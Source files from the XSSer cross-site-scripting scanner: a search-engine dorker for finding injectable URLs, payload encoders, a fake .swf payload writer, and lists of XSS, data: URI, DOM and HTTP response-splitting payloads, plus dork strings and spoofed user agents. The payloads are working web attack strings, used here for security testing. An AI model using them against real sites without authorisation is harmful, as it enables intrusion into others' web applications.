        #m['pretransfer-time'] = str(self.handle.getinfo(pycurl.PRETRANSFER_TIME))
        #m['redirect-time'] = str(self.handle.getinfo(pycurl.REDIRECT_TIME))
        #m['redirect-count'] = str(self.handle.getinfo(pycurl.REDIRECT_COUNT))
        #m['size-upload'] = str(self.handle.getinfo(pycurl.SIZE_UPLOAD))
        #m['size-download'] = str(self.handle.getinfo(pycurl.SIZE_DOWNLOAD))
        #m['speed-upload'] = str(self.handle.getinfo(pycurl.SPEED_UPLOAD))
        m['header-size'] = str(self.handle.getinfo(pycurl.HEADER_SIZE))
        m['request-size'] = str(self.handle.getinfo(pycurl.REQUEST_SIZE))
        m['response-code'] = str(self.handle.getinfo(pycurl.RESPONSE_CODE))
        m['ssl-verifyresult'] = str(self.handle.getinfo(pycurl.SSL_VERIFYRESULT))
        # strip(';') trims stray semicolons from values like 'text/html;'
        m['content-type'] = (self.handle.getinfo(pycurl.CONTENT_TYPE) or '').strip(';')
        m['cookielist'] = str(self.handle.getinfo(pycurl.INFO_COOKIELIST))
        #m['content-length-download'] = str(self.handle.getinfo(pycurl.CONTENT_LENGTH_DOWNLOAD))
        #m['content-length-upload'] = str(self.handle.getinfo(pycurl.CONTENT_LENGTH_UPLOAD))
        #m['encoding'] = str(self.handle.getinfo(pycurl.ENCODING))
        return m
+
+    @classmethod
+    def print_options(cls):
+        """
+        Print selected options.
+        """
+        print "\n[-]Verbose: active"
+        print "[-]Cookie:", cls.cookie
+        print "[-]HTTP User Agent:", cls.agent
+        print "[-]HTTP Referer:", cls.referer
+        print "[-]Extra HTTP Headers:", cls.headers
+        if cls.xforw == True:
+            print "[-]X-Forwarded-For:", "Random IP"
+        else:
+            print "[-]X-Forwarded-For:", cls.xforw
+        if cls.xclient == True:
+            print "[-]X-Client-IP:", "Random IP"
+        else:
+            print "[-]X-Client-IP:", cls.xclient
+        print "[-]Authentication Type:", cls.atype
+        print "[-]Authentication Credentials:", cls.acred
+        if cls.ignoreproxy == True:
+            print "[-]Proxy:", "Ignoring system default HTTP proxy"
+        else:
+            print "[-]Proxy:", cls.proxy
+        print "[-]Timeout:", cls.timeout
+        if cls.tcp_nodelay == True:
+            print "[-]Delaying:", "TCP_NODELAY activate"
+        else:
+            print "[-]Delaying:", cls.delay, "seconds"
+        if cls.followred == True:
+            print "[-]Follow 302 code:", "active"
+            if cls.fli:
+                print"[-]Limit to follow:", cls.fli
+        else:
+            print "[-]Delaying:", cls.delay, "seconds"
+
+        print "[-]Retries:", cls.retries, "\n"
+
+    def answered(self, check):
+        """
+        Check for occurence of a string in the payload from
+        the latest operation.
+        """
+        return self.payload.find(check) >= 0
+
    def close(self):
        """
        Close the curl handle.

        Releases the libcurl handle and the in-memory header buffer,
        then flags the instance so __del__ does not close twice.
        """
        self.handle.close()
        self.header.close()
        self._closed = True
+
    def __del__(self):
        # Safety net: release the handles if the caller never called
        # close() explicitly.
        if not self._closed:
            self.close()

+ 103 - 0
xsser/core/dork.py

@@ -0,0 +1,103 @@
+#!/usr/bin/env python
+# -*- coding: utf-8 -*-"
+# vim: set expandtab tabstop=4 shiftwidth=4:
+"""
+This file is part of the xsser project, https://xsser.03c8.net
+
+Copyright (c) 2011/2016/2018 psy <epsylon@riseup.net>
+
+xsser is free software; you can redistribute it and/or modify it under
+the terms of the GNU General Public License as published by the Free
+Software Foundation version 3 of the License.
+
+xsser is distributed in the hope that it will be useful, but WITHOUT ANY
+WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
+FOR A PARTICULAR PURPOSE.  See the GNU General Public License for more
+details.
+
+You should have received a copy of the GNU General Public License along
+with xsser; if not, write to the Free Software Foundation, Inc., 51
+Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
+........
+
+List of search engines: http://en.wikipedia.org/wiki/List_of_search_engines
+
+"""
+import urllib2, traceback, re, random
+urllib2.socket.setdefaulttimeout(5.0)
+
+DEBUG = 0
+
+class Dorker(object):
+    def __init__(self, engine='yahoo'):
+        self._engine = engine
+        self.search_engines = [] # available dorking search engines
+        self.search_engines.append('bing')
+        self.search_engines.append('yahoo')
+        self.agents = [] # user-agents
+        try:
+            f = open("core/fuzzing/user-agents.txt").readlines() # set path for user-agents
+        except:
+            f = open("fuzzing/user-agents.txt").readlines() # set path for user-agents when testing
+        for line in f:
+            self.agents.append(line)
+
+    def dork(self, search):
+        """
+        Perform a search and return links.
+        """
+        if self._engine == 'bing': # works at 20-02-2011 -> 19-02-2016 -> 09-04-2018
+            search_url = 'https://www.bing.com/search?q="' + search + '"'
+        elif self._engine == 'yahoo': # works at 20-02-2011 -> 19-02-2016 -> -> 09-04-2018
+            search_url = 'https://search.yahoo.com/search?q="' + search + '"'
+        else:
+            print "\n[Error] This search engine is not supported!\n" 
+            print "[Info] List of available:"
+            print '-'*25
+            for e in self.search_engines:
+                print "+ "+e
+            print ""
+        try:
+            self.search_url = search_url
+            print "\n[Info] Search query:", urllib2.unquote(search_url)
+            user_agent = random.choice(self.agents).strip() # set random user-agent
+            referer = '127.0.0.1' # set referer to localhost / WAF black magic!
+            headers = {'User-Agent' : user_agent, 'Referer' : referer}
+            req = urllib2.Request(search_url, None, headers)
+            html_data = urllib2.urlopen(req).read()
+            print "\n[Info] Retrieving requested info..."
+        except urllib2.URLError, e:
+            if DEBUG:
+                traceback.print_exc()
+            print "\n[Error] Cannot connect!"
+            return
+        if self._engine == 'bing':
+            regex = '<h2><a href="(.+?)" h=' # regex magics 09-04/2018
+        if self._engine == 'yahoo':
+            regex = 'RU=(.+?)/RK=' # regex magics [09/04/2018]
+        pattern = re.compile(regex)
+        links = re.findall(pattern, html_data)
+        found_links = []
+        if links:
+            for link in links:
+                link = urllib2.unquote(link)
+                if self._engine == "yahoo":
+                    if "RU=https://www.yahoo.com/" in link:
+                        link = "" # invalid url
+                if search.upper() in link.upper(): # parse that search query is on url
+                    sep = search
+                    link2 = link.split(sep,1)[0]
+                    if link2 not in found_links: # parse that target is not duplicated
+                        found_links.append(link)
+        else:
+            print "\n[Info] Not any link found for that query!"
+        return found_links
+
+if __name__ == '__main__':
+    for a in ['yahoo', 'bing']:
+        dork = Dorker(a)
+        res = dork.dork("news.php?id=")
+        if res:
+            print "[+]", a, ":", len(res), "\n"
+            for b in res:
+                print " *", b

+ 116 - 0
xsser/core/encdec.py

@@ -0,0 +1,116 @@
+#!/usr/bin/env python
+# -*- coding: utf-8 -*-"
+# vim: set expandtab tabstop=4 shiftwidth=4:
+"""
+$Id$
+
+This file is part of the xsser project, http://xsser.03c8.net
+
+Copyright (c) 2011/2016 psy <epsylon@riseup.net>
+
+xsser is free software; you can redistribute it and/or modify it under
+the terms of the GNU General Public License as published by the Free
+Software Foundation version 3 of the License.
+
+xsser is distributed in the hope that it will be useful, but WITHOUT ANY
+WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
+FOR A PARTICULAR PURPOSE.  See the GNU General Public License for more
+details.
+
+You should have received a copy of the GNU General Public License along
+with xsser; if not, write to the Free Software Foundation, Inc., 51
+Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
+"""
+import urllib
+
class EncoderDecoder(object):
    """
    Helper to encode and decode strings with the different hashing and
    encoding algorithms used when mutating payloads.
    """

    def __init__(self):
        # Dispatch table: short algorithm tag -> encoder callable.
        self.encmap = {
            "Str": self._fromCharCodeEncode,
            "Hex": self._hexEncode,
            "Hes": self._hexSemiEncode,
            "Une": self._unEscape,
            "Dec": self._decEncode,
            "Mix": lambda data: self._unEscape(self._fromCharCodeEncode(data)),
        }

    def _fromCharCodeEncode(self, string):
        """
        Encode *string* as a comma separated list of character codes.
        """
        return ",".join(str(ord(char)) for char in string)

    def _hexEncode(self, string):
        """
        Encode *string* as URL-style hex escapes (%XX).
        """
        return "".join("%" + hex(ord(char))[2:] for char in string)

    def _hexSemiEncode(self, string):
        """
        Encode *string* as HTML hexadecimal entities (&#xXX;).
        """
        return "".join("&#x" + hex(ord(char))[2:] + ";" for char in string)

    def _decEncode(self, string):
        """
        Encode *string* as HTML decimal entities (&#NN, no semicolon).
        """
        return "".join("&#" + str(ord(char)) for char in string)

    def _unEscape(self, string):
        """
        URL-quote every character of *string*.
        """
        return "".join(urllib.quote(char) for char in string)

    def _ipDwordEncode(self, string):
        """
        Encode a dotted-quad IP address as a single dword integer.

        Returns 0 when *string* is not a four-part dotted quad.
        """
        parts = string.split('.')
        if len(parts) != 4:
            return 0
        hexed = ''
        for number in parts:
            chunk = hex(int(number))[2:]
            if len(chunk) == 1:
                chunk = '0' + chunk
            hexed += chunk
        return int(hexed, 16)

    def _ipOctalEncode(self, string):
        """
        Encode a dotted-quad IP address with zero-padded octal octets.

        Returns 0 when *string* is not a four-part dotted quad.
        """
        parts = string.split('.')
        if len(parts) != 4:
            return 0
        return ".".join(oct(int(part)).zfill(4) for part in parts)
+
+if __name__ == "__main__":
+    encdec = EncoderDecoder()
+    print encdec._ipOctalEncode("127.0.0.1")

+ 52 - 0
xsser/core/flashxss.py

@@ -0,0 +1,52 @@
+#!/usr/bin/env python
+# -*- coding: utf-8 -*-"
+# vim: set expandtab tabstop=4 shiftwidth=4:
+"""
+$Id$
+
+This file is part of the xsser project, http://xsser.03c8.net
+
+Copyright (c) 2011/2016 psy <epsylon@riseup.net>
+
+xsser is free software; you can redistribute it and/or modify it under
+the terms of the GNU General Public License as published by the Free
+Software Foundation version 3 of the License.
+
+xsser is distributed in the hope that it will be useful, but WITHOUT ANY
+WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
+FOR A PARTICULAR PURPOSE.  See the GNU General Public License for more
+details.
+
+You should have received a copy of the GNU General Public License along
+with xsser; if not, write to the Free Software Foundation, Inc., 51
+Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
+"""
+import os
+
class FlashInjections(object):
    """
    Build -fake- flash movies (.swf) carrying an XSS payload.
    """

    def __init__(self, payload =''):
        # Payload kept for reference; flash_xss() receives its own copy.
        self._payload = payload

    def flash_xss(self, filename, payload):
        """
        Create -fake- flash movie (.swf) with code XSS injected.

        Writes *payload* (or a default JS payload when empty) to
        *filename* and returns a human readable report string; returns
        an error string when *filename* does not end in .swf.
        """
        root, ext = os.path.splitext(filename)
        if ext.lower() != ".swf":
            return "\nPlease select a filename with extension .swf"
        user_payload = payload
        if not user_payload:
            user_payload = 'a="get";b="URL";c="javascript:";d="alert("XSS");void(0);";eval(a+b)(c+d);'
        content = user_payload
        f = open(filename, 'wb')
        try:
            f.write(content)
        finally:
            # BUGFIX: close even if the write raises.
            f.close()
        # BUGFIX: a stray comma used to turn this report into a tuple
        # ("...File: ", root + ext); concatenate into a single string.
        return "\nCode: " + content + "\nFile: " + root + ext
+
if __name__ == '__main__':
    # Demo when run directly: drop a fake .swf with a sample payload
    # into the current working directory and print the report.
    flash_xss_injection = FlashInjections('')
    print flash_xss_injection.flash_xss('FlashXSSpoison.swf' , "<script>alert('XSS')</script>")

+ 55 - 0
xsser/core/fuzzing/DCP.py

@@ -0,0 +1,55 @@
+#!/usr/bin/env python
+# -*- coding: utf-8 -*-"
+# vim: set expandtab tabstop=4 shiftwidth=4:
+"""
+$Id$
+
+This file is part of the xsser project, http://xsser.03c8.net
+
+Copyright (c) 2011/2016 psy <epsylon@riseup.net>
+
+xsser is free software; you can redistribute it and/or modify it under
+the terms of the GNU General Public License as published by the Free
+Software Foundation version 3 of the License.
+
+xsser is distributed in the hope that it will be useful, but WITHOUT ANY
+WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
+FOR A PARTICULAR PURPOSE.  See the GNU General Public License for more
+details.
+
+You should have received a copy of the GNU General Public License along
+with xsser; if not, write to the Free Software Foundation, Inc., 51
+Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
+"""
+## This file contains different XSS fuzzing vectors.
+## If you have some new, please email me to [epsylon@riseup.net]
+## Happy Cross Hacking! ;)
+
# Data Control Protocol (data: URI) based XSS vectors. Each entry maps
# 'payload' (the injection string, mostly base64-encoded data: URIs) to
# 'browser' (the human readable tag shown in reports). The entries kept
# commented out are alternative encodings preserved for reference.
DCPvectors = [
		{ 'payload' : """<a href="data:text/html;base64,JTNjc2NyaXB0JTNlYWxlcnQoIlhTUyIpO2hpc3RvcnkuYmFjaygpOyUzYy9zY3JpcHQlM2UiPjwv YT4=""",
                  'browser' : """[Data Control Protocol Injection]""" },

		{ 'payload' : """<iframe src="data:text/html;base64,JTNjc2NyaXB0JTNlYWxlcnQoIlhTUyIpO2hpc3RvcnkuYmFjaygpOyUzYy9zY3JpcHQlM2UiPjwv""",
		  'browser' : """[Data Control Protocol Injection]"""},	
	
		#{ 'payload' : """data:text/html;base64,PHNjcmlwdD5hbGVydCgiWFNTIik7aGlzdG9yeS5iYWNrKCk7PC9zY3JpcHQ+""",
                #  'browser' : """[Data Control Protocol Injection]"""},

		#{ 'payload' : """data:text/html;base64,K0FEdy1zY3JpcHQrQUQ0LWFsZXJ0KCJYU1MiKStBRHMtaGlzdG9yeS5iYWNrKCkrQURzQVBBLS9z-""",
		#  'browser' : """[Data Control Protocol Injection]""" },

		#{ 'payload' : """data:text/html;base64,LCtBRHdBY3dCakFISUFhUUJ3QUhRQVBnKy1hbGVydCgiWFNTIik7aGlzdG9yeS5iYWNrKCkrQURz""",
                #  'browser' : """[Data Control Protocol Injection]""" },

		#{ 'payload' : """data:text/html;base64,K0FEd0Fjd0JqQUhJQWFRQndBSFFBUGdCaEFHd0FaUUJ5QUhRQUtBQXhBQ2tBT3dCb0FHa0Fjd0Iw""",
                #  'browser' : """[Data Control Protocol Injection]""" },

		#{ 'payload' : """data:text/html;base64,K0FEdy1zY3JpcHQrQUQ0LWFsZXJ0KFhTUykrQURzLWhpc3RvcnkuYmFjaygpK0FEc0FQQS0vc2Ny aXB0K0FENC0=""",
                #  'browser' : """[Data Control Protocol Injection]""" },

		{ 'payload' : """0?<script>Worker("#").onmessage=function(_)eval(_.data)</script> :postMessage(importScripts('data:;base64,PHNjcmlwdD5hbGVydCgiWFNTIik7aGlzdG9yeS5iYWNrKCk7PC9zY3JpcHQ+'))""",
		  'browser' : """[Data Control Protocol Injection]"""},

		{ 'payload' : """data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hsaW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAwIiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlhTUyIpOzwvc2NyaXB0Pjwvc3ZnPg==""",
                  'browser' : """[Data Control Protocol Injection]""" }
		]

+ 44 - 0
xsser/core/fuzzing/DOM.py

@@ -0,0 +1,44 @@
+#!/usr/bin/env python
+# -*- coding: utf-8 -*-"
+# vim: set expandtab tabstop=4 shiftwidth=4:
+"""
+$Id$
+
+This file is part of the xsser project, http://xsser.03c8.net
+
+Copyright (c) 2011/2016 psy <epsylon@riseup.net>
+
+xsser is free software; you can redistribute it and/or modify it under
+the terms of the GNU General Public License as published by the Free
+Software Foundation version 3 of the License.
+
+xsser is distributed in the hope that it will be useful, but WITHOUT ANY
+WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
+FOR A PARTICULAR PURPOSE.  See the GNU General Public License for more
+details.
+
+You should have received a copy of the GNU General Public License along
+with xsser; if not, write to the Free Software Foundation, Inc., 51
+Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
+"""
+## This file contains different XSS fuzzing vectors.
+## If you have some new, please email me to [epsylon@riseup.net]
+## Happy Cross Hacking! ;)
+
# XSS fuzzing vectors targeting the Document Object Model. 'PAYLOAD'
# is substituted with the real injection at run time; 'browser' is the
# human readable tag shown in reports.
DOMvectors = [
    {'payload': "?notname=PAYLOAD",
     'browser': "[Document Object Model Injection]"},

    {'payload': "?notname=PAYLOAD&",
     'browser': "[Document Object Model Injection]"},

    {'payload': '<object id="x" classid="clsid:CB927D12-4FF7-4a9e-A169-56E4B8A75598"></object> <object classid="clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B" onqt_error="PAYLOAD" style="behavior:url(#x);"><param name=postdomevents /></object>',
     'browser': "[Document Object Model Injection]"},

    {'payload': "?<script>history.pushState(0,0,'PAYLOAD');</script>",
     'browser': "[Document Object Model Injection]"},

    {'payload': "?foobar=name=PAYLOAD&",
     'browser': "[Document Object Model Injection]"},
]
+

+ 66 - 0
xsser/core/fuzzing/HTTPsr.py

@@ -0,0 +1,66 @@
+#!/usr/bin/env python
+# -*- coding: utf-8 -*-"
+# vim: set expandtab tabstop=4 shiftwidth=4:
+"""
+$Id$
+
+This file is part of the xsser project, http://xsser.03c8.net
+
+Copyright (c) 2011/2016 psy <epsylon@riseup.net>
+
+xsser is free software; you can redistribute it and/or modify it under
+the terms of the GNU General Public License as published by the Free
+Software Foundation version 3 of the License.
+
+xsser is distributed in the hope that it will be useful, but WITHOUT ANY
+WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
+FOR A PARTICULAR PURPOSE.  See the GNU General Public License for more
+details.
+
+You should have received a copy of the GNU General Public License along
+with xsser; if not, write to the Free Software Foundation, Inc., 51
+Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
+"""
+## This file contains different XSS fuzzing vectors.
+## If you have some new, please email me to [epsylon@riseup.net]
+## Happy Cross Hacking! ;)
+
# HTTP response splitting ("induced injection") vectors: CRLF sequences
# (%0d%0a) that try to smuggle extra headers / bodies into the response.
# Several payloads intentionally contain literal newlines and leading
# whitespace inside the triple-quoted strings.
HTTPrs_vectors = [
		{ 'payload' : """%0d%0AContent-Length:%200%0d%0A%0d%0AHTTP/1.1%20200%20OK%0d%0AContent-Length:%2016%0d%0A%0d%0A&lt;html&gt;XSS&lt;/html&gt;
			""",
                  'browser' : """[Induced Injection]""" },

		{ 'payload' : """XSS%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2029%0d%0a%0d%0a<script>alert("XSS")</script>""",
                  'browser' : """[Induced Injection]""" },

		{ 'payload' : """%0D%0ASet-Cookie%3AXSS""",
                  'browser' : """[Induced Injection]""" },

		{ 'payload' : """%0AContent-Type:html%0A%0A%3Cbody%20onload=alert(%22XSS%22)%3E""",
                  'browser' : """[Induced Injection]""" },

		{ 'payload' : """%0AContent-Type:text/html%0A%0A%3Cscript%3Ealert(%22XSS%22)%3C/script%3Ehttp://www.test.com""",
                  'browser' : """[Induced Injection]""" },

		{ 'payload' : """%0AContent-type:%20html%0A%0Ahttp://www.test.com/%3Cscript%3Ealert(%22XSS%22)%3C/script%3E""",
                  'browser' : """[Induced Injection]""" },

		{ 'payload' : """%0AExpect:%20%3Cscript%3Ealert(%22XSS%22)%3C/script%3E""",
                  'browser' : """[Induced Injection]""" },

		{ 'payload' : """%0d%0aContent-Type: text/html%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aLast-Modified: Wed, 13 Jan 2006 12:44:23 GMT%0d%0aContent-Type:text/html%0d%0a%0d%0a<html>XSS</html>%20HTTP/1.1""",
		  'browser' : """[Induced Injection]"""},
				
		{ 'payload' : """%0d%0aContent-Type: text/html%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aCache-Control: no-cache%0d%0aContent-Type: text/html%0d%0a%0d%0a<html>XSS</html>%20HTTP/1.1
			""",
                  'browser' : """[Induced Injection]"""},

		{ 'payload' : """%0d%0aContent-Type: text/html%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aPragma:no-cache%0d%0aContent-Type: text/html%0d%0a%0d%0a<html>XSS</html>%20HTTP/1.1
			""",
		  'browser' : """[Induced Injection]""" },

		{ 'payload' : """%0d%0AContent-Type: text/html;charset=UTF-7%0A%0A%2BADw-script%2BAD4-alert('%58%53%53');%2BADw-/script%2BAD4-
			""",
                  'browser' : """[Induced Injection]""" }
		]
+

+ 20 - 0
xsser/core/fuzzing/__init__.py

@@ -0,0 +1,20 @@
+"""
+$Id$
+
+This file is part of the xsser project, http://xsser.03c8.net
+
+Copyright (c) 2011/2016 psy <epsylon@riseup.net>
+
+xsser is free software; you can redistribute it and/or modify it under
+the terms of the GNU General Public License as published by the Free
+Software Foundation version 3 of the License.
+
+xsser is distributed in the hope that it will be useful, but WITHOUT ANY
+WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
+FOR A PARTICULAR PURPOSE.  See the GNU General Public License for more
+details.
+
+You should have received a copy of the GNU General Public License along
+with xsser; if not, write to the Free Software Foundation, Inc., 51
+Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
+"""

+ 30 - 0
xsser/core/fuzzing/dorks.txt

@@ -0,0 +1,30 @@
+.php?cmd=
+.php?z=
+.php?q=
+.php?search=
+.php?query=
.php?searchstring=
.php?keyword=
+.php?file=
+.php?years=
+.php?txt=
+.php?tag=
+.php?max=
+.php?from=
+.php?author=
+.php?pass=
.php?feedback=
+.php?mail=
+.php?cat=
+.php?vote=
+search.php?q=
headersearch.php?sid=
+/news.php?id=
+/search_results.php?search=
/notice.php?msg=
/view.php?PID=
/search.php?search_keywords=
/contentPage.php?id=
+/main.php?sid=
+/feedpost.php?url=
/poll/default.asp?catid=

+ 104 - 0
xsser/core/fuzzing/heuristic.py

@@ -0,0 +1,104 @@
+#!/usr/bin/env python
+# -*- coding: utf-8 -*-"
+# vim: set expandtab tabstop=4 shiftwidth=4:
+"""
+$Id$
+
+This file is part of the xsser project, http://xsser.03c8.net
+
+Copyright (c) 2011/2016 psy <epsylon@riseup.net>
+
+xsser is free software; you can redistribute it and/or modify it under
+the terms of the GNU General Public License as published by the Free
+Software Foundation version 3 of the License.
+
+xsser is distributed in the hope that it will be useful, but WITHOUT ANY
+WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
+FOR A PARTICULAR PURPOSE.  See the GNU General Public License for more
+details.
+
+You should have received a copy of the GNU General Public License along
+with xsser; if not, write to the Free Software Foundation, Inc., 51
+Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
+"""
+## This file contains different XSS fuzzing vectors.
+## If you have some new, please email me to [epsylon@riseup.net]
+## Happy Cross Hacking! ;)
+
# Heuristic probes: harmless marker strings used to discover which
# special characters -- and which encodings of them -- survive the
# target's filtering. Every probe is tagged "[Heuristic test]".
heuristic_test = [
    # Plain ASCII characters.
    {'payload': "XSS\\XSS", 'browser': "[Heuristic test]"},
    {'payload': "XSS/XSS", 'browser': "[Heuristic test]"},
    {'payload': "XSS>XSS", 'browser': "[Heuristic test]"},
    {'payload': "XSS<XSS", 'browser': "[Heuristic test]"},
    {'payload': "XSS;XSS", 'browser': "[Heuristic test]"},
    {'payload': "XSS'XSS", 'browser': "[Heuristic test]"},
    {'payload': 'XSS"XSS', 'browser': "[Heuristic test]"},
    {'payload': "XSS=XSS", 'browser': "[Heuristic test]"},
    # Hex / unescape encodings ('/' is identical in Unicode and ASCII,
    # so it has no hex probe of its own).
    {'payload': "XSS%5CXSS", 'browser': "[Heuristic test]"},
    {'payload': "XSS%3EXSS", 'browser': "[Heuristic test]"},
    {'payload': "XSS%3CXSS", 'browser': "[Heuristic test]"},
    {'payload': "XSS%3BXSS", 'browser': "[Heuristic test]"},
    {'payload': "XSS%27XSS", 'browser': "[Heuristic test]"},
    {'payload': "XSS%22XSS", 'browser': "[Heuristic test]"},
    {'payload': "XSS%3DXSS", 'browser': "[Heuristic test]"},
    # Decimal HTML entities (no trailing semicolon).
    {'payload': "XSS&#92XSS", 'browser': "[Heuristic test]"},
    {'payload': "XSS&#47XSS", 'browser': "[Heuristic test]"},
    {'payload': "XSS&#62XSS", 'browser': "[Heuristic test]"},
    {'payload': "XSS&#60XSS", 'browser': "[Heuristic test]"},
    {'payload': "XSS&#59XSS", 'browser': "[Heuristic test]"},
    {'payload': "XSS&#39XSS", 'browser': "[Heuristic test]"},
    {'payload': 'XSS&#34XSS', 'browser': "[Heuristic test]"},
    {'payload': "XSS&#61XSS", 'browser': "[Heuristic test]"},
]
+
+

+ 95 - 0
xsser/core/fuzzing/user-agents.txt

@@ -0,0 +1,95 @@
+Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
+Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36
+Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1667.0 Safari/537.36
+Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.811.0 Safari/535.1
+Mozilla/5.0 (X11; CrOS i686 12.433.109) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.93 Safari/534.30
+Mozilla/5.0 (Macintosh; U; Mac OS X 10_6_1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/ Safari/530.5
+Mozilla/5.0 (Linux; U; en-US) AppleWebKit/525.13 (KHTML, like Gecko) Chrome/0.2.149.27 Safari/525.13
+Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1
+Mozilla/5.0 (Windows NT 6.1; rv:21.0) Gecko/20130401 Firefox/21.0
+Mozilla/6.0 (Windows; U; Windows NT 7.0; en-US; rv:1.9.0.8) Gecko/2009032609 Firefox/3.0.9 (.NET CLR 3.5.30729)
+Mozilla/5.0 (X11; U; Linux x86_64; fr; rv:1.9.0.9) Gecko/2009042114 Ubuntu/9.04 (jaunty) Firefox/3.0.9
+Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-TW; rv:1.8.0.2) Gecko/20060308 Firefox/1.5.0.2
+Mozilla/5.0 (Windows; U; Windows NT5.1; en; rv:1.7.10) Gecko/20050716 Firefox/1.0.5
+Mozilla/5.0 (Windows; U; Win98; fr-FR; rv:1.7.6) Gecko/20050226 Firefox/1.0.1
+Mozilla/5.0 (X11; U; Linux i686; de-DE; rv:1.6) Gecko/20040207 Firefox/0.8
+Mozilla/5.0 (X11) KHTML/4.9.1 (like Gecko) Konqueror/4.9
+Mozilla/5.0 (compatible; Konqueror/4.5; FreeBSD) KHTML/4.5.4 (like Gecko)
+Mozilla/5.0 (compatible; Konqueror/3.5; NetBSD 4.0_RC3; X11) KHTML/3.5.7 (like Gecko)
+Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko
+Mozilla/5.0 (compatible, MSIE 11, Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
+Mozilla/4.0(compatible; MSIE 7.0b; Windows NT 6.0)
+Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 7.0; InfoPath.3; .NET CLR 3.1.40767; Trident/6.0; en-IN)
+Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)
+Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)
+Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/4.0; InfoPath.2; SV1; .NET CLR 2.0.50727; WOW64)
+Mozilla/5.0 (compatible; MSIE 10.0; Macintosh; Intel Mac OS X 10_7_3; Trident/6.0)
+Mozilla/4.0 (Compatible; MSIE 8.0; Windows NT 5.2; Trident/6.0)
+Mozilla/1.22 (compatible; MSIE 10.0; Windows 3.1)
+Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0
+Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; yie8)
+Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.0; Windows NT 5.1; .NET CLR 1.1.4322; Zango 10.1.181.0)
+Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.5; AOLBuild 4337.35; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
+Mozilla/4.0 (compatible; MSIE 6.0; AOL 8.0; Windows NT 5.1; SV1)
+Mozilla/5.0 (X11; Ubuntu; Linux armv7l; rv:17.0) Gecko/20100101 Firefox/17.0
+Mozilla/2.02E (Win95; U)
+Mozilla/5.0 (iPhone; U; CPU iOS 2_0 like Mac OS X; en-us)
+Mozilla/5.0 (Linux; U; Android 0.5; en-us)
+Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
+Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
+Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.13 (KHTML, like Gecko) Chrome/0.2.149.29 Safari/525.13
+Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)
+Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)
+Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (FM Scene 4.6.1)
+Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729) (Prevx 3.0.5)
+Mozilla/5.0 (compatible; Konqueror/4.5; FreeBSD) KHTML/4.5.4 (like Gecko)
+Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:5.0) Whistler/20110021 myibrow/5.0.0.0
+Mozilla/4.08 [en] (WinNT; I ;Nav)
